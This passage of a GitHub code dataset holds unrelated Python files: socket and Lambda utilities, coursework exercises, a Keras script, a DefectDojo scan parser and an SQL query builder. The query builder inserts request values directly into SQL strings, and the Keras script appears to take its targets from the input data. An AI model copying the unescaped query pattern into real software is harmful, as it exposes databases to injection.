the user-provided request handler class passed to the server constructor.\n# 4.sock.serve_forever(): handle an unlimited number of requests.\n# 5.sock.shutdown(): stop the serve_forever() loop.\n# 6.sock.fileno(): return the integer file descriptor of the server socket. This method lets the server instance be used efficiently with polling operations such as the select() function.\nclass MyServer(socketserver.BaseRequestHandler):\n\n    def handle(self):\n        print(\"from conn:\",self.request)\n        while True:\n            data=self.request.recv(1024)\n            if not data: break\n            print(data)\n            self.request.send(data.upper())\n\n\ns1=socketserver.ThreadingTCPServer((\"127.0.0.1\",8080),MyServer)\ns1.serve_forever()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"awuxina/www","sub_path":"网络编程和并发/多并发的远程执行命令/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15179826296","text":"import boto3\nimport json\nfrom json import JSONEncoder\nimport datetime\n\ncc_client = boto3.client('codecommit')\ncb_client = boto3.client('codebuild')\n\ndef lambda_handler(event, context):\n    report_response = cb_client.batch_get_reports(reportArns=event['taskresult']['Build']['ReportArns'])\n    reports = report_response['reports']\n    for report in reports:\n        if 'codeCoverageSummary' in report:\n            response = cc_client.post_comment_for_pull_request(\n                pullRequestId=event['detail']['pullRequestId'],\n                repositoryName=event['detail']['repositoryNames'][0],\n                beforeCommitId=event['detail']['destinationCommit'],\n                afterCommitId=event['detail']['sourceCommit'],\n                content=json.dumps(report['codeCoverageSummary'])\n            )\n        if 'testSummary' in report:\n            response = 
cc_client.post_comment_for_pull_request(\n                pullRequestId=event['detail']['pullRequestId'],\n                repositoryName=event['detail']['repositoryNames'][0],\n                beforeCommitId=event['detail']['destinationCommit'],\n                afterCommitId=event['detail']['sourceCommit'],\n                content=json.dumps(report['testSummary'])\n            )\n    return \"\"","repo_name":"richardhboyd/codebuild-samples","sub_path":"codebuild-webinar/functions/pr_updater/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"73469801641","text":"\ndef min_CAD_coins(money):\n    \"\"\"\n    12. (5 points) Suppose that a cashier in Canada owes a customer some change and that the\n    cashier only has coins ie. toonies, loonies, quarters, dimes, and nickels. Write a\n    function that determines the minimum number of coins that the cashier can return. In\n    particular, write a function min_CAD_coins(price,payment) that returns five numbers\n    (t,l,q,d,n) that represent the smallest number of coins (toonies, loonies, quarters,\n    dimes, and nickels) that add up to the amount owed to the customer (here price and\n    payment are defined as in the previous question). Your program must first call the\n    cad_cashier function, from question 11, to determine the amount of change that\n    needs to be returned. Then before doing anything else, you may want to convert this\n    amount entirely to cents (that should be of type int). Once you have the total number\n    of cents here are some hints on how to find the minimum number of coins.\n    \"\"\"\n\n    # Using greedy algo\n\n    # Dictionary to represent number of coins to return\n    coins =\t{\n        2: 0, # toonies\n        1: 0, # loonies\n        0.25: 0, # quarters\n        0.10: 0, # dimes\n        0.05: 0, # nickels\n    }\n\n    balance = 0\n    count = 0\n\n    for coin in coins:\n        # How much of the money can be returned with this particular coin\n        count = int(money//coin)\n        coins[coin] = count\n        balance = money%coin\n        # if the decimal part of the division is 0, then no more checking needs to be done.\n        # otherwise subtract the amount we covered with the bigger coin\n        if(balance==0):\n            break\n        else:\n            money = money-(count*coin)\n\n    print(coins)\n    return\n\nmin_CAD_coins(10.50)\nmin_CAD_coins(3.80)\n","repo_name":"justinjk007/Sandbox","sub_path":"python/cashier.py","file_name":"cashier.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22029905909","text":"\"\"\"API resources for general mailing list subscribers.\"\"\"\nimport logging\nimport os\n\nfrom webargs.flaskparser import use_kwargs\nfrom flask_restful import abort, Resource\n\nfrom registration.src.api import base\nfrom registration.src.api.utils import mailing_list\n\nLOG = logging.getLogger(__name__)\n\n\nclass SubscriberList(Resource):\n    # pylint: disable=no-member, no-self-use\n    \"\"\"Endpoint to add to a generic email list.\"\"\"\n    @use_kwargs({\n        'email': base.SimilarKwargs.POST['email']\n    })\n    def post(self, email):\n        \"\"\"Sends confirmation in a post req\n\n        :param email: email to send to\n        :type email: String\n        :returns: email success or error\n        : rtype : String\n        \"\"\"\n        response = mailing_list.add(email, os.environ['MAILCHIMP_SUBSCRIBER_LIST'])\n        jsoned_response = response.json()\n\n        request_did_error = response.status_code < 200 or response.status_code > 299\n        if request_did_error:\n            LOG.error('Failed to add {} to mailing list: {}'.format(email, jsoned_response)) # pylint: 
disable=logging-format-interpolation\n abort(\n jsoned_response.get('status'),\n status='failed',\n title=jsoned_response.get('title'),\n detail=jsoned_response.get('detail'),\n errors=jsoned_response.get('errors')\n )\n return {'status': 'success'}\n","repo_name":"CruzHacks/cruzhacks-2019-registration-service","sub_path":"services/registration/src/api/subscriber.py","file_name":"subscriber.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28527404708","text":"#!/gpfs/home/mncui/soft/anaconda3/bin/python\nimport numpy as np\nimport pandas as pd\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import CuDNNLSTM\nfrom keras.wrappers.scikit_learn import KerasRegressor\nfrom sklearn.cross_validation import cross_val_score\nfrom sklearn.cross_validation import KFold\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nimport matplotlib.pyplot as plt\nfrom keras.layers import Dropout\nlog = open('run.log','a')\n\n\ncalina = pd.read_table('symple.dat',header = None)\nx = calina.values[0:4000000,0:50]\n#calina = calina.values[:,0:25]\n#calinb = pd.rad_table('../pos10/symple.dat',header = None)\n#calinb = calinb.values[:,:]\n#calin = np.r_[calina,calinb]\ncaloua = pd.read_csv('chgcar.dat',header = None)\ny = calina.values[0:4000000,0]\nx_val = calina.values[4000001:,0:50]\ny_val = caloua.values[4000001:,0]\n#caloub = pd.rad_csv('../pos10/chgcar.dat',header = None)\n#caloub = calinb.values[:,:]\n#calou = np.r_[caloua,caloub]\n\nmodel = Sequential()\nmodel.add(Dropout(0.5, input_shape=(50,)))\nmodel.add(Dense(512,input_dim=50, init='normal', activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(512, init='normal', activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(512, init='normal', activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(512, init='normal', activation='relu'))\nmodel.add(Dropout(0.5))\n\nmodel.compile(loss='mean_squared_error',\n optimizer='adam',metrics=['accuracy'])\n#model.summary()\n\n# validation_split=0.9,\nhistory = model.fit(x,y,epochs=100,batch_size=200000,verbose=1,validation_data=(x_val,y_val))\nprint(history.history.keys())\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\n\nepochs = range(1, len(loss)+1)\n\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\nplt.legend()\nplt.savefig('loss.png')\nplt.clf()\n\naccuracy = history.history['acc']\nval_acc = history.history['val_acc']\n\nplt.plot(epochs, accuracy,'bo', label='Accuracy')\nplt.plot(epochs, val_acc,'b', label='Validation accuracy')\nplt.title('Training and validation accuracy')\nplt.xlabel('epochs')\nplt.ylabel('accuracy')\nplt.legend()\nplt.savefig('accuracy.png')\n","repo_name":"MengnanCui/VASP_scripts","sub_path":"4. 
Machine learning/keras.py","file_name":"keras.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"4852397290","text":"\"\"\"This file contains scripts that add emacs-like functionality not \r\nfound in Wing's internal emacs support layer.\r\n\r\nCopyright (c) 2005, Wingware All rights reserved.\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining\r\na copy of this software and associated documentation files (the\r\n\"Software\"), to deal in the Software without restriction, including\r\nwithout limitation the rights to use, copy, modify, merge, publish,\r\ndistribute, sublicense, and/or sell copies of the Software, and to\r\npermit persons to whom the Software is furnished to do so, subject to\r\nthe following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be\r\nincluded in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\r\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\r\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\r\nIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\r\nCLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\r\nTORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\r\nSOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\"\"\"\r\n\r\nimport os\r\nimport wingapi\r\n\r\n# Scripts can be internationalize with gettext. Strings to be translated\r\n# are sent to _() as in the code below.\r\nimport gettext\r\n_ = gettext.translation('scripts_emacs_extensions', fallback = 1).ugettext\r\n\r\n# This special attribute is used so that the script manager can translate\r\n# also docstrings for the commands found here\r\n_i18n_module = 'scripts_emacs_extensions'\r\n\r\n######################################################################\r\ndef add_change_log_entry(user_name=None, email=None, changelog=None, \r\n changed_file=None, func=None,\r\n other_window=False, new_entry=False):\r\n \"\"\"Add a change log entry\"\"\"\r\n \r\n kItemDelimiter = '\\n * '\r\n kDateFormat = '%Y-%m-%d'\r\n kDefaultUserName = os.environ.get('USERNAME', os.environ.get('USER', 'Unknown Name'))\r\n kDefaultEmail = '<%s@%s>' % (os.environ.get('USER', 'unknown'), \r\n os.environ.get('HOSTNAME', 'localhost'))\r\n app = wingapi.gApplication\r\n \r\n doc = app.GetActiveDocument()\r\n curfile = None\r\n if doc is not None:\r\n filename = doc.GetFilename()\r\n if not filename.startswith('unknown:'):\r\n from wingutils import location # undocumented\r\n dirname, curfile = location.SplitPathUrl(filename)\r\n \r\n if user_name is None:\r\n user_name = kDefaultUserName\r\n if email is None:\r\n email = kDefaultEmail\r\n if changelog is None:\r\n proj = wingapi.gApplication.GetProject()\r\n changelog = proj.GetFilename()\r\n changelog = os.path.join(os.path.dirname(changelog), 'ChangeLog')\r\n if changed_file is None:\r\n doc = wingapi.gApplication.GetActiveDocument()\r\n changed_file = os.path.basename(doc.GetFilename())\r\n if func is None:\r\n ed = wingapi.gApplication.GetActiveEditor()\r\n scope_info = ed.GetSourceScope()\r\n func = '.'.join(scope_info[2:])\r\n \r\n import time\r\n stime = time.strftime(kDateFormat)\r\n header = \"%s %s %s\" % (stime, user_name, email)\r\n editor = app.OpenEditor(changelog, raise_window=True)\r\n if editor is None:\r\n return\r\n doc = editor.GetDocument()\r\n 
txt = doc.GetText()\r\n pos = txt.find(header)\r\n if pos == -1 or new_entry:\r\n doc.InsertChars(0, header + '\\n')\r\n pos = len(header) + 1\r\n doc.InsertChars(pos, '\\n\\n')\r\n else:\r\n pos += len(header) + 1\r\n\r\n if curfile is not None:\r\n item = kItemDelimiter + curfile\r\n if func is not None:\r\n item += ' (%s)' % func\r\n item += ': '\r\n doc.InsertChars(pos, item)\r\n editor.SetSelection(pos + len(item), pos + len(item))\r\n","repo_name":"raychorn/svn_Wing_IDE","sub_path":"scripts/Wing IDE 4.0/emacs-extensions.py","file_name":"emacs-extensions.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11172108441","text":"import json\nfrom datetime import datetime\n\nfrom dojo.models import Finding\n\n\nclass JFrogXrayUnifiedParser(object):\n \"\"\"JFrog Xray JSON reports\"\"\"\n\n def get_scan_types(self):\n return [\"JFrog Xray Unified Scan\"]\n\n def get_label_for_scan_types(self, scan_type):\n return scan_type\n\n def get_description_for_scan_types(self, scan_type):\n return \"Import Xray Unified (i.e. Xray version 3+) findings in JSON format.\"\n\n def get_findings(self, json_output, test):\n tree = json.load(json_output)\n return self.get_items(tree, test)\n\n def get_items(self, tree, test):\n items = []\n if \"rows\" in tree:\n vulnerabilityTree = tree[\"rows\"]\n\n for node in vulnerabilityTree:\n item = get_item(node, test)\n\n items.append(item)\n\n return items\n\n\ndef get_item(vulnerability, test):\n # Some items have multiple CVEs for some reason, so get the CVE with the highest CVSSv3 score.\n # Note: the xray v2 importer just took the first CVE in the list, that\n # doesn't seem ideal though\n highestCvssV3Index = 0\n highestCvssV3Score = 0\n\n for thisCveIndex in range(0, len(vulnerability[\"cves\"]) - 1):\n # not all cves have cvssv3 scores, so skip these. 
If no v3 scores,\n # we'll default to index 0\n if \"cvss_v3_score\" in vulnerability[\"cves\"][thisCveIndex]:\n thisCvssV3Score = vulnerability[\"cves\"][thisCveIndex][\n \"cvss_v3_score\"\n ]\n if thisCvssV3Score > highestCvssV3Score:\n highestCvssV3Index = thisCveIndex\n highestCvssV3Score = thisCvssV3Score\n\n # Following the CVSS Scoring per https://nvd.nist.gov/vuln-metrics/cvss\n if \"severity\" in vulnerability:\n if vulnerability[\"severity\"] == \"Unknown\":\n severity = \"Info\"\n else:\n severity = vulnerability[\"severity\"].title()\n # TODO: Needs UNKNOWN new status in the model.\n else:\n severity = \"Info\"\n\n cveIndex = highestCvssV3Index\n\n vulnerability_id = None\n cvss_v3 = \"No CVSS v3 score.\" # for justification field\n cvssv3 = None # for actual cvssv3 field\n cvss_v2 = \"No CVSS v2 score.\"\n mitigation = None\n extra_desc = \"\"\n\n cves = vulnerability.get(\"cves\", [])\n if len(cves) > 0:\n worstCve = cves[cveIndex]\n if \"cve\" in cves[cveIndex]:\n vulnerability_id = worstCve[\"cve\"]\n if \"cvss_v3_vector\" in worstCve:\n cvss_v3 = worstCve[\"cvss_v3_vector\"]\n cvssv3 = cvss_v3\n if \"cvss_v2_vector\" in worstCve:\n cvss_v2 = worstCve[\"cvss_v2_vector\"]\n\n if (\n \"fixed_versions\" in vulnerability\n and len(vulnerability[\"fixed_versions\"]) > 0\n ):\n mitigation = \"Versions containing a fix:\\n\"\n mitigation = mitigation + \"\\n\".join(vulnerability[\"fixed_versions\"])\n\n if (\n \"external_advisory_source\" in vulnerability\n and \"external_advisory_severity\" in vulnerability\n ):\n extra_desc = (\n vulnerability[\"external_advisory_source\"]\n + \": \"\n + vulnerability[\"external_advisory_severity\"]\n )\n\n if vulnerability[\"issue_id\"]:\n title = vulnerability[\"issue_id\"] + \" - \" + vulnerability[\"summary\"]\n else:\n title = vulnerability[\"summary\"]\n\n references = \"\\n\".join(vulnerability[\"references\"])\n\n scan_time = datetime.strptime(\n vulnerability[\"artifact_scan_time\"], \"%Y-%m-%dT%H:%M:%S%z\"\n )\n\n # component has several parts separated by colons. 
Last part is the\n # version, everything else is the name\n splitComponent = vulnerability[\"vulnerable_component\"].split(\":\")\n component_name = \":\".join(splitComponent[:-1])\n component_version = splitComponent[-1:][0]\n # remove package type from component name\n component_name = component_name.split(\"://\", 1)[1]\n\n tags = [\"packagetype_\" + vulnerability[\"package_type\"]]\n\n # create the finding object\n finding = Finding(\n title=title,\n test=test,\n severity=severity,\n description=(\n vulnerability[\"description\"] + \"\\n\\n\" + extra_desc\n ).strip(),\n mitigation=mitigation,\n component_name=component_name,\n component_version=component_version,\n file_path=vulnerability[\"path\"],\n severity_justification=\"CVSS v3 base score: {}\\nCVSS v2 base score: {}\".format(\n cvss_v3, cvss_v2\n ),\n static_finding=True,\n dynamic_finding=False,\n references=references,\n impact=severity,\n cvssv3=cvssv3,\n date=scan_time,\n unique_id_from_tool=vulnerability[\"issue_id\"],\n tags=tags,\n )\n\n if vulnerability_id:\n finding.unsaved_vulnerability_ids = [vulnerability_id]\n\n return finding\n","repo_name":"DefectDojo/django-DefectDojo","sub_path":"dojo/tools/jfrog_xray_unified/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","stars":3128,"dataset":"github-code","pt":"18"} +{"seq_id":"28319510653","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 22 09:50:02 2019\n\n@author: ngochung\n\"\"\"\nimport string\nstring.hexdigits\nstring.ascii_uppercase\nreplacements=(('A','4'),('E','3'),('G','6'),('I','1'),('O','0'),('S','5'),('Z','2'))\nmy_string=input('nhap chuoi o day:') \nnew_string=my_string.upper()\nif 1<=len(my_string)<=100:\n for old,new in replacements:\n new_string=new_string.replace(old,new)\nelse:\n False\nprint(new_string)","repo_name":"NNH2512/paiza","sub_path":"changestring.py","file_name":"changestring.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27243849594","text":"from brein import SlangenBrein\nimport random\n\nclass Soetkin(SlangenBrein):\n \n @classmethod\n def uiterlijk(cls):\n return {\n \"apiversion\": \"1\",\n \"author\": \"soetkin\",\n \"color\": \"#FFC0CB\",\n \"head\": \"safe\",\n \"tail\": \"round-bum\",\n }\n\n def bereken_waarde_voor_richting(self, richting):\n if self.is_geblokkeerd(richting):\n return -1000\n \n # soetkin kiest willekeurig \n return random.randint(0, 100)","repo_name":"goes/battlesnake-nl","sub_path":"src/slangen/soetkin.py","file_name":"soetkin.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12582047561","text":"# @author: Gautam Patel\n# Problem Description URL: https://www.hackerrank.com/challenges/flatland-space-stations/problem\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the flatlandSpaceStations function below.\ndef flatlandSpaceStations(n, c):\n c_len = len(c)\n c.sort()\n max_d = c[0]\n for i in range(1, c_len):\n #print('{} {}'.format(i, max_d))\n d = (c[i]+c[i-1])//2\n max_d = (d-c[i-1] if d-c[i-1] > max_d else max_d)\n max_d = (c[i]-d-1 if c[i]-d-1 > max_d else max_d)\n if n-c[c_len-1]-1 > max_d:\n max_d = n-c[c_len-1]-1\n return max_d\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n nm = input().split()\n\n n = int(nm[0])\n\n m = 
int(nm[1])\n\n c = list(map(int, input().rstrip().split()))\n\n result = flatlandSpaceStations(n, c)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"gautambp/HackerRank","sub_path":"Master/python3/flatland-space-stations.py","file_name":"flatland-space-stations.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33652306537","text":"# -*- coding: utf8 -*-\n\nfrom logging import error\n\n# TODO REMOVE UTILITY\nfrom os.path import join\n\nfrom utility.os_interface import write_file_data, read_file_data\nfrom utility.path_str import get_relative_path\n\n\nclass playlist_wpl:\n def __init__(self):\n pass\n\n # filter src path\n def __get_new_track_path(self, old_track_path):\n old_track_path = old_track_path.split('\"')[1].replace(\"D:\\Musik\", \"\").replace(\"..\", \"\").replace('\\\\', \"/\")\n return \"/home/christian/Musik\" + old_track_path\n\n def get_files(self, path, playlist_name):\n\n if \".wpl\" not in playlist_name[-4:]:\n error(\"wrong playlist name\", playlist_name)\n return None\n\n old_data = read_file_data(path, playlist_name)\n if old_data is None:\n error(\"empty playlist \" + playlist_name)\n return None\n\n tracks_str = old_data.split(\"seq\")\n tracks_str.pop()\n\n if (len(tracks_str) is 2):\n tracks = tracks_str[1].split(\"']\n backlog.append(tag)\n return depth\n\n # descend hierarchy\n # close xml tag\n def __step_down(self, new_data, depth, backlog):\n tag = backlog.pop()\n new_data += [depth * ' ' + '']\n return depth - 1\n\n # write data of one track\n def __write_track(self, new_data, track_path, depth, backlog):\n depth = self.__step_up(new_data, 'track', depth, backlog)\n depth = self.__step_up(new_data, 'location', depth, backlog)\n\n new_data += [(depth + 1) * ' ' + 'file://' + track_path]\n\n depth = self.__step_down(new_data, depth, backlog)\n depth = self.__step_down(new_data, depth, backlog)\n\n def generate_playlist(self, album_path, playlist_path, playlist_name, files):\n # initialize hierarchy\n depth = 0\n backlog = []\n\n # begin xml document\n new_data = ['']\n new_data += ['']\n depth = self.__step_up(new_data, 'trackList', depth, backlog)\n\n # write xml data\n for file in files:\n self.__write_track(new_data, album_path + '/' + file, depth, backlog)\n\n # close xml document\n depth = self.__step_down(new_data, depth, backlog)\n new_data += ['']\n\n write_file_data(playlist_path, playlist_name, data=\"\\n\".join(new_data))\n\n\ndef generate_playlist_m3u(album_path, playlist_path, playlist_name, files):\n album_path = get_relative_path(playlist_path, album_path)\n files = [join(album_path, file) for file in files]\n\n write_file_data(playlist_path, playlist_name, data=\"\\n\".join(files).replace(\"/\", '\\\\'))\n\n\n# GENERATE the playlist\ndef generate_playlist(album_path, playlist_path, playlist_name, files):\n if playlist_name.endswith('.m3u') or playlist_name.endswith('.pls'):\n generate_playlist_m3u(album_path, playlist_path, playlist_name, files)\n\n elif playlist_name.endswith('.xspf'):\n playlist_xspf().generate_playlist(album_path, playlist_path, playlist_name, files)\n","repo_name":"ChsHub/music_file_suite","sub_path":"src/meta/songs/playlists.py","file_name":"playlists.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18180448733","text":"from random import randint\nv = []\nmenor = 0\nindice = 0\n\nfor i in 
range(10):\n v.append(randint(1,50))\nprint(\"Antes >>\",v)\n\n#Selection Sort\nfor j in range(10):\n for i in range(indice,10):\n if v[menor] > v[i]:\n menor = i\n if i == 9:\n v[indice],v[menor] = v[menor],v[indice]\n indice += 1\n menor = indice\nprint(\"Depois >>\",v)\n\n'''\nv.sort()\n'''","repo_name":"PabloHenrique/AulasPython-Fatec","sub_path":"Exercícios/Microinformática/Termo I/Lista 06/exe07.py","file_name":"exe07.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"19231967052","text":"import numpy as np\nfrom tqdm import tqdm\n\ndef get_primes(n, primes=[2]):\n\n if n < len(primes):\n return primes\n\n m = primes[-1]\n\n while len(primes) < n:\n m += 1\n is_prime = True\n for prime in primes:\n if m % prime == 0:\n is_prime = False\n break\n if prime > np.sqrt(m):\n break\n if is_prime == True:\n primes.append(m)\n\n return primes\n\n\n","repo_name":"Gregory-Eales/project-euler","sub_path":"Python-Solutions/prime_gen.py","file_name":"prime_gen.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25119962784","text":"#!/usr/bin/python\n# -*- coding: utf-8\n# DataBase for IceSite\nimport my\nimport re\nfrom datetime import datetime\n\n\"\"\" Условия запроса \"\"\"\ndef qw_where(postdata,prefix=\"\",repq={},repf={}):\n query=[]\n if prefix!=\"\":\n prefix=prefix+\".\"\n for key,val in postdata.items():\n _key=key\n _prefix=prefix\n _ap=\"`\"\n if repq.has_key(key):\n query.append( repq[key][val[\"value\"]])\n continue\n if repf.has_key(key):\n _key=repf[key][0]\n _prefix=\"\"\n _ap=\"\"\n if repf[key][1]!=None:\n val['mod']=repf[key][1]\n if val[\"mod\"]==None:\n val[\"mod\"]=\"=\"\n if val[\"mod\"] in [\"IN\",\"NOT IN\"]:\n value=\"(%s)\" % val[\"value\"]\n elif val[\"mod\"] in [\"LIKE\"]:\n value=\"('%\"+val[\"value\"]+\"%')\"\n elif re.match(\"^-*[0-9\\.]+$\",val['value']):\n value=\"%s\" % val[\"value\"]\n else:\n value=\"'%s'\" % val[\"value\"]\n query.append(\"%s%s%s%s %s %s\" % (_prefix,_ap,_key,_ap,val[\"mod\"],value))\n return query\n\n\"\"\" Список полей с префиксом и исключением \"\"\"\ndef qw_get_fieldlist(prefix,fieldsorder,without,add=[]):\n if prefix!=\"\":\n prefix+=\".\"\n res=[]\n for f in fieldsorder:\n if not f in without:\n res.append(prefix+f)\n return res+add\n\ndef qw_where_trsc(data_hd,data_ct):\n #print data_hd\n repq_hd={ \"isegais\": {\"0\":\"egais_sign=''\",\"1\":\"egais_sign<>''\"},\\\n \"isdiscountcard\":{\"0\":\"discount_card=''\",\"1\":\"discount_card<>''\"},\\\n \"isbonuscard\":{\"0\":\"bonus_card=''\",\"1\":\"bonus_card<>''\"},\\\n \"iserror\":{\"0\":\"errors=''\",\"1\":\"errors<>''\"},\\\n \"type_pay\":{\"0\":\"pay_bnal=0\",\"1\":\"pay_bnal<>0\",\"2\":\"pay_bnal<>0 and pay_nal<>0\"},\\\n }\n repf_hd= { \"date1\":[\"hd.date\",\">=\"],\\\n \"date2\":[\"hd.date\",\"<=\"],\\\n \"time1\":[\"hd.time\",\">=\"],\\\n \"time2\":[\"hd.time\",\"<=\"],\\\n \"summa_wod\":[\"hd.summa-hd.discount_sum-hd.bonus_discount\",None],\\\n }\n repq_ct={ \"limitprice\": {\"0\":\"p_maxprice=0 and p_minprice=0\",\"1\":\"(p_maxprice<>0 or p_minprice<>0)\"},\\\n \"ch_cena\":{\"0\":\"p_cena=paramf1\",\"1\":\"p_cena<>paramf1\"},\\\n }\n repf_ct= { \"ct_bonus\":[\"(ct.bonus/ct.paramf3)*100\",None],\\\n \"ct_bonus_discount\":[\"(ct.bonus_discount/ct.paramf3)*100\",None],\n \"discount\":[\"(ct.discount/ct.paramf3)*100\",None],\n }\n\n 
hd_query=qw_where(data_hd,\"hd\",repq_hd,repf_hd)\n ct_query=qw_where(data_ct,\"ct\",repq_ct,repf_ct)\n\n thd_query=\" and \".join(hd_query)\n tct_query=\" and \".join(ct_query)\n if tct_query!=\"\":\n tct_query=\" and \"+tct_query\n q_where = \"where hd.idreg=ct.idreg and hd.idplace=ct.idplace and hd.nkassa=ct.nkassa and hd.id=ct.idhd \"\n q_order = \" order by hd.idreg, hd.idplace, hd.nkassa, hd.date, hd.time, ct.id\"\n q = q_where+\" and \"+thd_query+tct_query+q_order\n return q\n\ndef qw_query_trsc_short(hd,ct,fields,fields_calc):\n add=[]\n for k,v in fields_calc.items():\n add.append(\"(%s) as %s\" % (v,k))\n f=\",\".join(fields+add)\n w=qw_where_trsc(hd,ct)\n return \"select %s from tb_trsc_hd as hd,tb_trsc_ct as ct %s\" % (f,w)\n\ndef qw_query_trsc_full(hd,ct,fields,fields_calc):\n add=[]\n for k,v in fields_calc.items():\n add.append(\"(%s) as %s\" % (v,k))\n f=\",\".join(fields+add)\n w=qw_where_trsc(hd,ct)\n sub = \"select distinct hd.idreg,hd.idplace,hd.nkassa,hd.id from tb_trsc_hd as hd,tb_trsc_ct as ct %s\" % (w)\n q = \"select %s from (%s) as hdd,tb_trsc_hd as hd,tb_trsc_ct as ct \\\n where hdd.idreg=hd.idreg and hdd.idplace=hd.idplace and hdd.nkassa=hd.nkassa and hdd.id=hd.id and\\\n hd.idreg=ct.idreg and hd.idplace=ct.idplace and hd.nkassa=ct.nkassa and hd.id=ct.idhd\" % (f,sub)\n return q\n\n","repo_name":"redeyser/IceSite","sub_path":"qIceSite.py","file_name":"qIceSite.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25522031629","text":"import sys\n\n\ndef giveBooks():\n global N, M, want, given\n\n cnt = 0\n\n for left, right in want:\n for book in range(left, right+1):\n if given[book] == 0:\n given[book] = 1\n cnt += 1\n break\n\n print(cnt)\n\n\nif __name__ == '__main__':\n TC = int(input())\n for T in range(TC):\n N, M = map(int, input().split())\n want = [0 for _ in range(M)]\n given = [0 for _ in range(N+1)]\n\n for stu in range(M):\n a, b = map(int, sys.stdin.readline().split())\n want[stu] = (a, b)\n\n want.sort(key=lambda item: item[1])\n giveBooks()\n","repo_name":"jjungyeun/AlgorithmStudy2021","sub_path":"Baekjoon/2105/9576.py","file_name":"9576.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70075356202","text":"import os\n\n# Function to check if a number is prime\ndef is_prime(num):\n if num <= 1:\n return False\n if num <= 3:\n return True\n if num % 2 == 0 or num % 3 == 0:\n return False\n i = 5\n while i * i <= num:\n if num % i == 0 or num % (i + 2) == 0:\n return False\n i += 6\n return True\n\n# Check if the file 'primeoutputgpt.txt' exists\nif not os.path.isfile('primeoutputgpt.txt'):\n # If the file doesn't exist, create it and append '2 3' to it\n with open('primeoutputgpt.txt', 'w') as file:\n file.write('2 3\\n')\n\n# Read the last number from the file 'primeoutputgpt.txt' into the variable 'last_number'\nwith open('primeoutputgpt.txt', 'r') as file:\n numbers = file.read().split()\n last_number = int(numbers[-1])\n\n# Start an infinite loop\nwhile True:\n last_number += 1\n\n # Check if (last_number % 6) is equal to 1 or 5\n if (last_number % 6) == 1 or (last_number % 6) == 5:\n # Define a function to check if the number is prime by checking against known primes\n def check_known_prime(number):\n with open('primeoutputgpt.txt', 'r') as file:\n primes = [int(x) for x in file.read().split()]\n for prime in primes:\n if prime > number 
